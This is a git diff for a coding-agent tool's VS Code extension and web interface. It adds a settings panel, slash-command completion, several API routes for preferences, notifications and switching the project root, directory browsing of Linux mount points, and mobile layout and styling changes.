+	</div>
+
+	${ui.hasStats ? `
+	<!-- Stats -->
+	<div class="section" data-section="stats">
+		<div class="section-header"><span class="chevron">&#9660;</span> Stats</div>
+		<div class="section-body">
+			<div class="stats-grid">${ui.statRows}</div>
+		</div>
+	</div>
+	` : ""}
+
+	<!-- Actions -->
+	<div class="section" data-section="actions">
+		<div class="section-header"><span class="chevron">&#9660;</span> Actions</div>
+		<div class="section-body">
+			<div class="actions three-col">
+				<button class="action-btn" data-command="newSession">New</button>
+				<button class="action-btn" data-command="compact">Compact</button>
+				<button class="action-btn" data-command="copyLastResponse">Copy</button>
+				<button class="action-btn" data-command="status">Status</button>
+				<button class="action-btn" data-command="fixProblemsInFile">Fix Errs</button>
+				<button class="action-btn" data-command="showHistory">History</button>
+			</div>
+			<div style="margin-top:6px">
+				<button class="action-btn danger full" data-command="stop">Stop Agent</button>
+			</div>
+		</div>
+	</div>
+
+	<!-- Settings (collapsed by default) -->
+	<div class="section collapsed" data-section="settings">
+		<div class="section-header"><span class="chevron">&#9660;</span> Settings</div>
+		<div class="section-body">
+			<div class="toggle-row">
+				<span class="toggle-label">Auto-compact</span>
+				<span class="toggle-pill ${info.autoCompaction ? "on" : "off"}" data-command="toggleAutoCompaction">${info.autoCompaction ? "on" : "off"}</span>
+			</div>
+			<div class="toggle-row">
+				<span class="toggle-label">Auto-retry</span>
+				<span class="toggle-pill ${info.autoRetry ? "on" : "off"}" data-command="toggleAutoRetry">${info.autoRetry ? "on" : "off"}</span>
+			</div>
+			<div class="toggle-row">
+				<span class="toggle-label">Steering</span>
+				<span class="toggle-pill ${info.steeringMode === "one-at-a-time" ? "on" : "off"}" data-command="toggleSteeringMode">${info.steeringMode === "one-at-a-time" ? "1-at-a-time" : "all"}</span>
+			</div>
+			<div class="toggle-row">
+				<span class="toggle-label">Follow-up</span>
+				<span class="toggle-pill ${info.followUpMode === "one-at-a-time" ? "on" : "off"}" data-command="toggleFollowUpMode">${info.followUpMode === "one-at-a-time" ? "1-at-a-time" : "all"}</span>
+			</div>
+			<div class="toggle-row">
+				<span class="toggle-label">Approval</span>
+				<span class="toggle-pill on" data-command="selectApprovalMode">change</span>
+			</div>
+		</div>
+	</div>`;
+	}
 }
 
 function escapeHtml(text: string): string {
@@ -435,6 +799,12 @@ function escapeHtml(text: string): string {
 		.replace(/"/g, "&quot;");
 }
 
+function formatNum(n: number): string {
+	if (n >= 1_000_000) return `${(n / 1_000_000).toFixed(1)}M`;
+	if (n >= 1_000) return `${(n / 1_000).toFixed(1)}k`;
+	return String(n);
+}
+
 function getNonce(): string {
 	const chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
 	let nonce = "";
diff --git a/vscode-extension/src/slash-completion.ts b/vscode-extension/src/slash-completion.ts
new file mode 100644
index 000000000..c36299d5b
--- /dev/null
+++ b/vscode-extension/src/slash-completion.ts
@@ -0,0 +1,109 @@
+import * as vscode from "vscode";
+import type { GsdClient, SlashCommand } from "./gsd-client.js";
+
+/**
+ * CompletionItemProvider that surfaces GSD slash commands when the user
+ * types `/` at the start of a line (or after only whitespace) in Markdown,
+ * plaintext, and TypeScript/JavaScript files.
+ *
+ * Commands are fetched from the running agent via get_commands RPC and
+ * cached so the list remains available between keystrokes.
+ */
+export class GsdSlashCompletionProvider
+	implements vscode.CompletionItemProvider, vscode.Disposable
+{
+	private cachedCommands: SlashCommand[] = [];
+	private disposables: vscode.Disposable[] = [];
+
+	constructor(private readonly client: GsdClient) {
+		// Refresh cache whenever the connection (re)establishes.
+		this.disposables.push(
+			client.onConnectionChange(async (connected) => {
+				if (connected) {
+					await this.refreshCache();
+				} else {
+					this.cachedCommands = [];
+				}
+			}),
+		);
+	}
+
+	async provideCompletionItems(
+		document: vscode.TextDocument,
+		position: vscode.Position,
+		_token: vscode.CancellationToken,
+	): Promise<vscode.CompletionItem[] | undefined> {
+		const lineText = document.lineAt(position).text;
+		const linePrefix = lineText.slice(0, position.character);
+
+		// Only activate when the non-whitespace content starts with `/`.
+		if (!/^\s*\/\S*$/.test(linePrefix)) {
+			return undefined;
+		}
+
+		// Lazily populate the cache on first use.
+		if (this.cachedCommands.length === 0 && this.client.isConnected) {
+			await this.refreshCache();
+		}
+
+		if (this.cachedCommands.length === 0) {
+			return undefined;
+		}
+
+		// The text the user has typed after the `/` — used for pre-filtering.
+		const slashIndex = linePrefix.lastIndexOf("/");
+		const typedAfterSlash = linePrefix.slice(slashIndex + 1);
+
+		// Range to replace: from the `/` to the current cursor position.
+		const replaceRange = new vscode.Range(
+			new vscode.Position(position.line, slashIndex),
+			position,
+		);
+
+		return this.cachedCommands
+			.filter(
+				(cmd) =>
+					typedAfterSlash.length === 0 ||
+					cmd.name.toLowerCase().startsWith(typedAfterSlash.toLowerCase()),
+			)
+			.map((cmd) => this.toCompletionItem(cmd, replaceRange));
+	}
+
+	dispose(): void {
+		for (const d of this.disposables) {
+			d.dispose();
+		}
+	}
+
+	private async refreshCache(): Promise<void> {
+		try {
+			const all = await this.client.getCommands();
+			// Only show /gsd commands — filter out unrelated extension/skill commands
+			this.cachedCommands = all.filter((cmd) => cmd.name.startsWith("gsd"));
+		} catch {
+			// Silently ignore — agent may not be ready yet.
+		}
+	}
+
+	private toCompletionItem(cmd: SlashCommand, replaceRange: vscode.Range): vscode.CompletionItem {
+		const item = new vscode.CompletionItem(`/${cmd.name}`, vscode.CompletionItemKind.Event);
+
+		item.insertText = `/${cmd.name}`;
+		item.filterText = `/${cmd.name}`;
+		item.sortText = cmd.name;
+		item.range = replaceRange;
+		item.commitCharacters = [" ", "\n"];
+
+		const sourceNote = `Source: \`${cmd.source}\`${cmd.location ? ` (${cmd.location})` : ""}`;
+		if (cmd.description) {
+			item.detail = cmd.description;
+			item.documentation = new vscode.MarkdownString(
+				`**/${cmd.name}** — ${cmd.description}\n\n${sourceNote}`,
+			);
+		} else {
+			item.documentation = new vscode.MarkdownString(`**/${cmd.name}**\n\n${sourceNote}`);
+		}
+
+		return item;
+	}
+}
diff --git a/web/app/api/browse-directories/route.ts b/web/app/api/browse-directories/route.ts
index 14e33585b..adc875bd0 100644
--- a/web/app/api/browse-directories/route.ts
+++ b/web/app/api/browse-directories/route.ts
@@ -1,6 +1,6 @@
 import { existsSync, readFileSync, readdirSync, statSync } from "node:fs";
 import { resolve, dirname, join } from "node:path";
-import { homedir } from "node:os";
+import { homedir, platform } from "node:os";
 
 export const runtime = "nodejs";
 export const dynamic = "force-dynamic";
@@ -24,6 +24,42 @@ function getDevRoot(): string {
   return homedir();
 }
 
+/**
+ * Get available mount points on Linux (external drives, removable media)
+ * Returns paths like /media, /mnt, /run/media/<user>
+ */
+function getLinuxMountPoints(): string[] {
+  const mountPoints: string[] = [];
+  const home = homedir();
+
+  const standardMounts = ["/media", "/mnt", "/run/media"];
+
+  for (const mp of standardMounts) {
+    if (existsSync(mp)) {
+      mountPoints.push(mp);
+    }
+  }
+
+  const runMediaUser = `/run/media/${home.split("/").pop()}`;
+  if (existsSync(runMediaUser)) {
+    mountPoints.push(runMediaUser);
+  }
+
+  return mountPoints;
+}
+
+/**
+ * Get additional root-level directories to show as shortcuts on Linux
+ * (for accessing external drives and mounted filesystems)
+ */
+function getAdditionalRoots(): string[] {
+  const os = platform();
+  if (os === "linux") {
+    return getLinuxMountPoints();
+  }
+  return [];
+}
+
 /**
  * GET /api/browse-directories?path=/some/path
  *
@@ -46,8 +82,15 @@ export async function GET(request: Request): Promise<Response> {
     // if no devRoot is configured. Navigating to the parent of devRoot is
     // allowed (one level up) so the UI can show the devRoot in context,
     // but nothing further.
+    // Also allow navigation to common mount points (/media, /mnt, /run/media) on Linux
     const devRootParent = dirname(devRoot);
-    if (!targetPath.startsWith(devRoot) && targetPath !== devRootParent) {
+    const additionalRoots = getAdditionalRoots();
+    const isAllowedPath =
+      targetPath.startsWith(devRoot) ||
+      targetPath === devRootParent ||
+      additionalRoots.some((root) => targetPath.startsWith(root));
+
+    if (!isAllowedPath) {
       return Response.json(
         { error: "Path outside allowed scope" },
         { status: 403 },
@@ -74,6 +117,9 @@ export async function GET(request: Request): Promise<Response> {
     const parentAllowed = parentPath.startsWith(devRootParent) && parentPath !== targetPath;
     const entries: Array<{ name: string; path: string }> = [];
 
+    // On Linux, show mount points as quick-access when browsing from home directory
+    const showMountPoints = platform() === "linux" && (targetPath === homedir() || targetPath === devRoot);
+
     try {
       const items = readdirSync(targetPath, { withFileTypes: true });
       for (const item of items) {
@@ -87,6 +133,19 @@ export async function GET(request: Request): Promise<Response> {
           path: resolve(targetPath, item.name),
         });
       }
+
+      // Add mount points as quick-access entries on Linux
+      if (showMountPoints) {
+        for (const mp of additionalRoots) {
+          if (existsSync(mp)) {
+            const mpName = mp.split("/").pop() || mp;
+            entries.push({
+              name: mpName,
+              path: mp,
+            });
+          }
+        }
+      }
     } catch {
       // Permission denied or other read error — return empty entries
     }
diff --git a/web/app/api/experimental/route.ts b/web/app/api/experimental/route.ts
new file mode 100644
index 000000000..ea87edcae
--- /dev/null
+++ b/web/app/api/experimental/route.ts
@@ -0,0 +1,110 @@
+import { homedir } from "node:os"
+import { readFileSync, writeFileSync, existsSync, mkdirSync } from "node:fs"
+import { join, dirname } from "node:path"
+import { parse as parseYaml, stringify as stringifyYaml } from "yaml"
+
+export const runtime = "nodejs"
+export const dynamic = "force-dynamic"
+
+const NO_STORE = { "Cache-Control": "no-store" } as const
+
+// ─── Helpers (same pattern as remote-questions/route.ts) ─────────────────────
+
+function getPreferencesPath(): string {
+  return join(homedir(), ".gsd", "PREFERENCES.md")
+}
+
+function parseFrontmatter(content: string): { data: Record<string, unknown>; body: string } {
+  const startMarker = content.startsWith("---\r\n") ? "---\r\n" : "---\n"
+  if (!content.startsWith(startMarker)) return { data: {}, body: content }
+  const searchStart = startMarker.length
+  const endIdx = content.indexOf("\n---", searchStart)
+  if (endIdx === -1) return { data: {}, body: content }
+  const block = content.slice(searchStart, endIdx)
+  const afterFrontmatter = content.slice(endIdx + 4)
+  try {
+    const parsed = parseYaml(block.replace(/\r/g, ""))
+    const data = typeof parsed === "object" && parsed !== null ? (parsed as Record<string, unknown>) : {}
+    return { data, body: afterFrontmatter }
+  } catch {
+    return { data: {}, body: content }
+  }
+}
+
+function writeFrontmatter(data: Record<string, unknown>, body: string): string {
+  const yamlStr = stringifyYaml(data, { lineWidth: 0 }).trimEnd()
+  return `---\n${yamlStr}\n---${body}`
+}
+
+function readPrefs(): { data: Record<string, unknown>; body: string } {
+  const path = getPreferencesPath()
+  if (!existsSync(path)) return { data: {}, body: "\n" }
+  const content = readFileSync(path, "utf-8")
+  return parseFrontmatter(content)
+}
+
+function writePrefs(data: Record<string, unknown>, body: string): void {
+  const path = getPreferencesPath()
+  const dir = dirname(path)
+  if (!existsSync(dir)) mkdirSync(dir, { recursive: true })
+  writeFileSync(path, writeFrontmatter(data, body), "utf-8")
+}
+
+// ─── GET — read current experimental flags ───────────────────────────────────
+
+export async function GET(): Promise<Response> {
+  try {
+    const { data } = readPrefs()
+    const exp = typeof data.experimental === "object" && data.experimental !== null
+      ? (data.experimental as Record<string, unknown>)
+      : {}
+    return Response.json({ rtk: exp.rtk === true }, { headers: NO_STORE })
+  } catch (err) {
+    const message = err instanceof Error ? err.message : String(err)
+    return Response.json({ error: message }, { status: 500, headers: NO_STORE })
+  }
+}
+
+// ─── PATCH — toggle an experimental flag ────────────────────────────────────
+//
+// Body: { flag: "rtk", enabled: boolean }
+
+export async function PATCH(request: Request): Promise<Response> {
+  try {
+    const body = await request.json() as Record<string, unknown>
+    const { flag, enabled } = body
+
+    const KNOWN_FLAGS = new Set(["rtk"])
+    if (typeof flag !== "string" || !KNOWN_FLAGS.has(flag)) {
+      return Response.json(
+        { error: `Unknown experimental flag "${flag}". Known flags: ${[...KNOWN_FLAGS].join(", ")}` },
+        { status: 400, headers: NO_STORE },
+      )
+    }
+    if (typeof enabled !== "boolean") {
+      return Response.json(
+        { error: "enabled must be a boolean" },
+        { status: 400, headers: NO_STORE },
+      )
+    }
+
+    const { data, body: mdBody } = readPrefs()
+
+    // Merge into experimental block
+    const existing = typeof data.experimental === "object" && data.experimental !== null
+      ? { ...(data.experimental as Record<string, unknown>) }
+      : {}
+    existing[flag] = enabled
+    data.experimental = existing
+
+    writePrefs(data, mdBody)
+
+    return Response.json({ [flag]: enabled }, { headers: NO_STORE })
+  } catch (err) {
+    const message = err instanceof Error ? err.message : String(err)
+    return Response.json(
+      { error: `Failed to update experimental flag: ${message}` },
+      { status: 500, headers: NO_STORE },
+    )
+  }
+}
diff --git a/web/app/api/notifications/route.ts b/web/app/api/notifications/route.ts
new file mode 100644
index 000000000..1754517fd
--- /dev/null
+++ b/web/app/api/notifications/route.ts
@@ -0,0 +1,49 @@
+import { collectNotificationsData, clearNotificationsData } from "../../../../src/web/notifications-service.ts"
+import { requireProjectCwd } from "../../../../src/web/bridge-service.ts"
+
+export const runtime = "nodejs"
+export const dynamic = "force-dynamic"
+
+export async function GET(request: Request): Promise<Response> {
+  try {
+    const projectCwd = requireProjectCwd(request);
+    const url = new URL(request.url)
+    const countOnly = url.searchParams.get("countOnly") === "true"
+
+    const payload = await collectNotificationsData(projectCwd)
+
+    if (countOnly) {
+      return Response.json(
+        { unreadCount: payload.unreadCount },
+        { headers: { "Cache-Control": "no-store" } },
+      )
+    }
+
+    return Response.json(payload, {
+      headers: { "Cache-Control": "no-store" },
+    })
+  } catch (error) {
+    const message = error instanceof Error ? error.message : String(error)
+    return Response.json(
+      { error: message },
+      { status: 500, headers: { "Cache-Control": "no-store" } },
+    )
+  }
+}
+
+export async function DELETE(request: Request): Promise<Response> {
+  try {
+    const projectCwd = requireProjectCwd(request);
+    await clearNotificationsData(projectCwd)
+    return Response.json(
+      { ok: true },
+      { headers: { "Cache-Control": "no-store" } },
+    )
+  } catch (error) {
+    const message = error instanceof Error ? error.message : String(error)
+    return Response.json(
+      { error: message },
+      { status: 500, headers: { "Cache-Control": "no-store" } },
+    )
+  }
+}
diff --git a/web/app/api/remote-questions/route.ts b/web/app/api/remote-questions/route.ts
index ae6e1cf4e..0215e08b3 100644
--- a/web/app/api/remote-questions/route.ts
+++ b/web/app/api/remote-questions/route.ts
@@ -84,7 +84,7 @@ function maskToken(token: string): string {
 // ─── Helpers ──────────────────────────────────────────────────────────────────
 
 function getPreferencesPath(): string {
-  return join(homedir(), ".gsd", "preferences.md")
+  return join(homedir(), ".gsd", "PREFERENCES.md")
 }
 
 function clamp(value: number | undefined, defaultVal: number, min: number, max: number): number {
diff --git a/web/app/api/switch-root/route.ts b/web/app/api/switch-root/route.ts
new file mode 100644
index 000000000..900023bbe
--- /dev/null
+++ b/web/app/api/switch-root/route.ts
@@ -0,0 +1,109 @@
+import { existsSync, readFileSync, statSync, writeFileSync, mkdirSync } from "node:fs";
+import { dirname, resolve } from "node:path";
+import { homedir } from "node:os";
+import { webPreferencesPath } from "../../../../src/app-paths.ts";
+import { discoverProjects } from "../../../../src/web/project-discovery-service.ts";
+
+export const runtime = "nodejs";
+export const dynamic = "force-dynamic";
+
+/** Shape of persisted web preferences. */
+interface WebPreferences {
+  devRoot?: string;
+  lastActiveProject?: string;
+}
+
+/** Expand leading `~/` to the user's home directory. */
+function expandTilde(p: string): string {
+  if (p === "~") return homedir();
+  if (p.startsWith("~/")) return homedir() + p.slice(1);
+  return p;
+}
+
+/**
+ * POST /api/switch-root
+ *
+ * Validates the new root path, persists it as the `devRoot` preference,
+ * and returns the discovered projects under the new root.
+ *
+ * Request body: { "devRoot": "/absolute/path" }
+ * Response:     { "devRoot": "/resolved/path", "projects": [...] }
+ */
+export async function POST(request: Request): Promise<Response> {
+  try {
+    const body = (await request.json()) as Record<string, unknown>;
+    const rawDevRoot = typeof body.devRoot === "string" ? body.devRoot.trim() : "";
+
+    if (!rawDevRoot) {
+      return Response.json(
+        { error: "Missing devRoot in request body" },
+        { status: 400 },
+      );
+    }
+
+    const expanded = expandTilde(rawDevRoot);
+    const resolved = resolve(expanded);
+
+    // Validate: path must exist
+    if (!existsSync(resolved)) {
+      return Response.json(
+        { error: `Path does not exist: ${resolved}` },
+        { status: 400 },
+      );
+    }
+
+    // Validate: path must be a directory
+    try {
+      const stat = statSync(resolved);
+      if (!stat.isDirectory()) {
+        return Response.json(
+          { error: `Not a directory: ${resolved}` },
+          { status: 400 },
+        );
+      }
+    } catch {
+      return Response.json(
+        { error: `Cannot access path: ${resolved}` },
+        { status: 400 },
+      );
+    }
+
+    // Read existing preferences and merge
+    let existing: WebPreferences = {};
+    try {
+      if (existsSync(webPreferencesPath)) {
+        existing = JSON.parse(readFileSync(webPreferencesPath, "utf-8"));
+      }
+    } catch {
+      // Corrupt file — start fresh
+    }
+
+    const prefs: WebPreferences = {
+      ...existing,
+      devRoot: resolved,
+      // Clear last active project since we're changing the root
+      lastActiveProject: undefined,
+    };
+
+    // Ensure parent directory exists
+    const dir = dirname(webPreferencesPath);
+    if (!existsSync(dir)) {
+      mkdirSync(dir, { recursive: true });
+    }
+
+    writeFileSync(webPreferencesPath, JSON.stringify(prefs, null, 2), "utf-8");
+
+    // Discover projects under the new root
+    const projects = discoverProjects(resolved, true);
+
+    return Response.json({
+      devRoot: resolved,
+      projects,
+    });
+  } catch (err) {
+    return Response.json(
+      { error: `Failed to switch root: ${err instanceof Error ? err.message : String(err)}` },
+      { status: 500 },
+    );
+  }
+}
diff --git a/web/app/api/terminal/sessions/route.ts b/web/app/api/terminal/sessions/route.ts
index 3e040cfd5..d6d9a8f0f 100644
--- a/web/app/api/terminal/sessions/route.ts
+++ b/web/app/api/terminal/sessions/route.ts
@@ -10,6 +10,7 @@ import {
   listSessions,
   getOrCreateSession,
   destroySession,
+  isAllowedTerminalCommand,
 } from "../../../../lib/pty-manager";
 import { requireProjectCwd } from "../../../../../src/web/bridge-service.ts";
 
@@ -27,19 +28,6 @@ export async function GET(): Promise<Response> {
   return Response.json({ sessions: listSessions() });
 }
 
-/**
- * Whitelist of commands allowed to be spawned via the terminal API.
- * Only known-safe executables are permitted to prevent arbitrary code execution
- * if the auth layer is ever bypassed.
- */
-const ALLOWED_COMMANDS = new Set([
-  "gsd",
-  process.env.SHELL || "/bin/zsh",
-  "/bin/bash",
-  "/bin/zsh",
-  "/bin/sh",
-]);
-
 export async function POST(request: Request): Promise<Response> {
   const projectCwd = requireProjectCwd(request);
   const id = `term-${getNextIndex()}`;
@@ -51,7 +39,7 @@ export async function POST(request: Request): Promise<Response> {
     // No body or invalid JSON — use default shell
   }
 
-  if (command && !ALLOWED_COMMANDS.has(command)) {
+  if (command && !isAllowedTerminalCommand(command)) {
     return Response.json(
       { error: `Command not allowed: ${command}` },
       { status: 403 },
diff --git a/web/app/api/terminal/stream/route.ts b/web/app/api/terminal/stream/route.ts
index ec5d2eab4..92b8f389a 100644
--- a/web/app/api/terminal/stream/route.ts
+++ b/web/app/api/terminal/stream/route.ts
@@ -9,6 +9,7 @@
 import {
   getOrCreateSession,
   addListener,
+  isAllowedTerminalCommand,
 } from "../../../../lib/pty-manager";
 import { requireProjectCwd } from "../../../../../src/web/bridge-service.ts";
 
@@ -24,6 +25,13 @@ export async function GET(request: Request): Promise<Response> {
   const commandArgs = url.searchParams.getAll("arg");
   const projectCwd = requireProjectCwd(request);
 
+  if (!isAllowedTerminalCommand(command)) {
+    return Response.json(
+      { error: `Command not allowed: ${command}` },
+      { status: 403 },
+    );
+  }
+
   // Ensure the session exists
   try {
     getOrCreateSession(sessionId, projectCwd, command, commandArgs);
diff --git a/web/app/globals.css b/web/app/globals.css
index c87d2c15d..48dac9159 100644
--- a/web/app/globals.css
+++ b/web/app/globals.css
@@ -60,12 +60,12 @@
   --secondary: oklch(0.18 0 0);
   --secondary-foreground: oklch(0.85 0 0);
   --muted: oklch(0.15 0 0);
-  --muted-foreground: oklch(0.55 0 0);
+  --muted-foreground: oklch(0.60 0 0);
   --accent: oklch(0.2 0 0);
   --accent-foreground: oklch(0.9 0 0);
   --destructive: oklch(0.5 0.15 25);
   --destructive-foreground: oklch(0.95 0 0);
-  --border: oklch(0.22 0 0);
+  --border: oklch(0.28 0 0);
   --input: oklch(0.15 0 0);
   --ring: oklch(0.4 0 0);
   --chart-1: oklch(0.7 0 0);
@@ -79,7 +79,7 @@
   --sidebar-primary-foreground: oklch(0.09 0 0);
   --sidebar-accent: oklch(0.15 0 0);
   --sidebar-accent-foreground: oklch(0.9 0 0);
-  --sidebar-border: oklch(0.18 0 0);
+  --sidebar-border: oklch(0.24 0 0);
   --sidebar-ring: oklch(0.35 0 0);
 
   /* Custom tokens */
@@ -88,7 +88,7 @@
   --info: oklch(0.6 0.1 250);
   --terminal: oklch(0.06 0 0);
   --terminal-foreground: oklch(0.75 0 0);
-  --code-line-number: oklch(0.35 0 0);
+  --code-line-number: oklch(0.42 0 0);
 }
 
 @theme inline {
@@ -146,6 +146,39 @@
   }
 }
 
+/* ── Mobile responsive: touch targets & safe areas ── */
+@media (max-width: 767px) {
+  /* Ensure touch targets meet 44px minimum */
+  .mobile-touch-target {
+    min-height: 44px;
+    min-width: 44px;
+  }
+
+  /* Mobile overlay for sidebar drawer */
+  .mobile-sidebar-overlay {
+    position: fixed;
+    inset: 0;
+    z-index: 40;
+    background: oklch(0 0 0 / 0.5);
+  }
+
+  /* Mobile sidebar drawer */
+  .mobile-sidebar-drawer {
+    position: fixed;
+    top: 0;
+    left: 0;
+    bottom: 0;
+    z-index: 50;
+    width: 260px;
+    transform: translateX(-100%);
+    transition: transform 200ms ease-out;
+  }
+
+  .mobile-sidebar-drawer.open {
+    transform: translateX(0);
+  }
+}
+
 /* ── File viewer: Shiki code blocks ── */
 .file-viewer-code pre {
   margin: 0;
@@ -177,7 +210,7 @@
   width: 3.5ch;
   margin-right: 1.5ch;
   text-align: right;
-  color: oklch(0.35 0 0);
+  color: var(--code-line-number);
   user-select: none;
 }
 
@@ -195,7 +228,7 @@
   margin-top: 0;
   margin-bottom: 1rem;
   padding-bottom: 0.5rem;
-  border-bottom: 1px solid oklch(0.22 0 0);
+  border-bottom: 1px solid var(--border);
 }
 
 .markdown-body h2 {
@@ -204,7 +237,7 @@
   margin-top: 1.75rem;
   margin-bottom: 0.75rem;
   padding-bottom: 0.35rem;
-  border-bottom: 1px solid oklch(0.22 0 0);
+  border-bottom: 1px solid var(--border);
 }
 
 .markdown-body h3 {
@@ -256,14 +289,14 @@
 .markdown-body blockquote {
   margin: 0.75rem 0;
   padding: 0.25rem 1rem;
-  border-left: 3px solid oklch(0.3 0 0);
+  border-left: 3px solid oklch(0.38 0 0);
   color: oklch(0.6 0 0);
 }
 
 .markdown-body hr {
   margin: 1.5rem 0;
   border: none;
-  border-top: 1px solid oklch(0.22 0 0);
+  border-top: 1px solid var(--border);
 }
 
 .markdown-body strong {
@@ -277,7 +310,7 @@
 
 .markdown-body del {
   text-decoration: line-through;
-  color: oklch(0.5 0 0);
+  color: oklch(0.55 0 0);
 }
 
 /* Task list checkboxes */
diff --git a/web/app/layout.tsx b/web/app/layout.tsx
index 8a3202a2b..f5afdf9d0 100644
--- a/web/app/layout.tsx
+++ b/web/app/layout.tsx
@@ -1,4 +1,4 @@
-import type { Metadata } from 'next'
+import type { Metadata, Viewport } from 'next'
 import { Geist, Geist_Mono } from 'next/font/google'
 import { Toaster } from '@/components/ui/sonner'
 import { ThemeProvider } from '@/components/theme-provider'
@@ -36,6 +36,13 @@ export const metadata: Metadata = {
   },
 }
 
+export const viewport: Viewport = {
+  width: 'device-width',
+  initialScale: 1,
+  maximumScale: 1,
+  userScalable: false,
+}
+
 export default function RootLayout({
   children,
 }: Readonly<{
diff --git a/web/components/gsd/app-shell.tsx b/web/components/gsd/app-shell.tsx
index 8f3454922..588c26cfd 100644
--- a/web/components/gsd/app-shell.tsx
+++ b/web/components/gsd/app-shell.tsx
@@ -2,6 +2,7 @@
 
 import Image from "next/image"
 import { useState, useEffect, useCallback, useRef, useSyncExternalStore } from "react"
+import { Menu, X } from "lucide-react"
 import { Sidebar, MilestoneExplorer, CollapsedMilestoneSidebar } from "@/components/gsd/sidebar"
 import { ShellTerminal } from "@/components/gsd/shell-terminal"
 import { Dashboard } from "@/components/gsd/dashboard"
@@ -57,6 +58,8 @@ function WorkspaceChrome() {
   const [sidebarCollapsed, setSidebarCollapsed] = useState(false)
   const [viewRestored, setViewRestored] = useState(false)
   const [projectsPanelOpen, setProjectsPanelOpen] = useState(false)
+  const [mobileNavOpen, setMobileNavOpen] = useState(false)
+  const [mobileMilestoneOpen, setMobileMilestoneOpen] = useState(false)
   const workspace = useGSDWorkspaceState()
   const { refreshBoot } = useGSDWorkspaceActions()
 
@@ -84,6 +87,16 @@ function WorkspaceChrome() {
     return () => window.clearTimeout(restoreTimer)
   }, [projectPath, viewRestored])
 
+  // Reset viewRestored when projectPath changes so the restore effect can
+  // fire for the newly-selected project (fixes #2711: tab reset on switch).
+  const prevProjectPath = useRef(projectPath)
+  useEffect(() => {
+    if (prevProjectPath.current !== projectPath) {
+      prevProjectPath.current = projectPath
+      setViewRestored(false)
+    }
+  }, [projectPath])
+
   // Persist view changes to sessionStorage
   useEffect(() => {
     if (!projectPath) return
@@ -122,8 +135,10 @@ function WorkspaceChrome() {
     document.title = titleOverride ? `${titleOverride} · ${base}` : base
   }, [titleOverride, projectLabel])
 
+  // Close mobile nav on view change
   const handleViewChange = useCallback((view: string) => {
     setActiveView(view)
+    setMobileNavOpen(false)
   }, [])
 
   // Listen for cross-component file navigation events (e.g. sidebar task clicks)
@@ -230,10 +245,54 @@ function WorkspaceChrome() {
     detection.kind !== "active-gsd" &&
     detection.kind !== "empty-gsd"
 
+  // --- Unauthenticated gate ---
+  // Render a clear recovery screen before any workspace chrome is mounted so
+  // users who open a manually-typed URL (no #token= fragment) get actionable
+  // guidance instead of a cascade of 401 errors.
+  if (workspace.bootStatus === "unauthenticated") {
+    return (
+      <div className="flex h-dvh flex-col items-center justify-center gap-6 bg-background p-8 text-center">
+        <Image
+          src="/logo-black.svg"
+          alt="GSD"
+          width={57}
+          height={16}
+          className="shrink-0 h-4 w-auto dark:hidden"
+        />
+        <Image
+          src="/logo-white.svg"
+          alt="GSD"
+          width={57}
+          height={16}
+          className="shrink-0 h-4 w-auto hidden dark:block"
+        />
+        <div className="flex flex-col items-center gap-2">
+          <h1 className="text-lg font-semibold text-foreground">Authentication Required</h1>
+          <p className="max-w-sm text-sm text-muted-foreground">
+            This workspace requires an auth token. Copy the full URL from your terminal
+            (including the{" "}
+            <code className="rounded bg-muted px-1 py-0.5 font-mono text-xs">#token=…</code>{" "}
+            part) or restart with{" "}
+            <code className="rounded bg-muted px-1 py-0.5 font-mono text-xs">gsd --web</code>.
+          </p>
+        </div>
+      </div>
+    )
+  }
+
   return (
     <div className="relative flex h-screen flex-col overflow-hidden bg-background text-foreground">
-      <header className="flex h-12 flex-shrink-0 items-center justify-between border-b border-border bg-card px-4">
-        <div className="flex items-center gap-3">
+      <header className="flex h-12 flex-shrink-0 items-center justify-between border-b border-border bg-card px-2 md:px-4">
+        <div className="flex items-center gap-2 md:gap-3 min-w-0">
+          {/* Mobile hamburger menu */}
+          <button
+            className="flex md:hidden h-10 w-10 items-center justify-center rounded-md text-muted-foreground hover:bg-accent/50 hover:text-foreground transition-colors"
+            onClick={() => setMobileNavOpen(!mobileNavOpen)}
+            aria-label={mobileNavOpen ? "Close navigation" : "Open navigation"}
+            data-testid="mobile-nav-toggle"
+          >
+            {mobileNavOpen ? <X className="h-5 w-5" /> : <Menu className="h-5 w-5" />}
+          </button>
           <div className="flex items-center gap-2">
             <Image
               src="/logo-black.svg"
@@ -249,12 +308,12 @@ function WorkspaceChrome() {
               height={16}
               className="shrink-0 h-4 w-auto hidden dark:block"
             />
-            <Badge variant="outline" className="text-[10px] rounded-full border-foreground/15 bg-accent/40 text-muted-foreground font-normal">
+            <Badge variant="outline" className="hidden sm:inline-flex text-[10px] rounded-full border-foreground/15 bg-accent/40 text-muted-foreground font-normal">
               beta
             </Badge>
           </div>
-          <span className="text-2xl font-thin text-muted-foreground/50 leading-none select-none">/</span>
-          <span className="text-sm text-muted-foreground" data-testid="workspace-project-cwd" title={projectPath ?? undefined}>
+          <span className="hidden sm:inline text-2xl font-thin text-muted-foreground leading-none select-none">/</span>
+          <span className="hidden sm:inline text-sm text-muted-foreground truncate" data-testid="workspace-project-cwd" title={projectPath ?? undefined}>
             {isConnecting ? (
               <Skeleton className="inline-block h-4 w-28 align-middle" />
             ) : (
@@ -274,11 +333,11 @@ function WorkspaceChrome() {
           </span>
         </div>
 
-        <div className="flex items-center gap-3">
+        <div className="flex items-center gap-2 md:gap-3">
           {/* Hidden status marker for test instrumentation */}
           <span className="sr-only" data-testid="workspace-connection-status">{status.label}</span>
           <span
-            className="text-xs text-muted-foreground"
+            className="hidden sm:inline text-xs text-muted-foreground"
             data-testid="workspace-scope-label"
           >
             {isConnecting ? <Skeleton className="inline-block h-3.5 w-40 align-middle" /> : <ScopeBadge label={scopeLabel} size="sm" />}
@@ -307,8 +366,53 @@ function WorkspaceChrome() {
         </div>
       )}
 
+      {/* Mobile navigation drawer */}
+      {mobileNavOpen && (
+        <div
+          className="fixed inset-0 z-40 bg-black/50 md:hidden"
+          onClick={() => setMobileNavOpen(false)}
+          data-testid="mobile-nav-overlay"
+        />
+      )}
+      <div
+        className={cn(
+          "fixed inset-y-0 left-0 z-50 w-64 transform bg-sidebar border-r border-border transition-transform duration-200 ease-out md:hidden",
+          mobileNavOpen ? "translate-x-0" : "-translate-x-full",
+        )}
+        data-testid="mobile-nav-drawer"
+      >
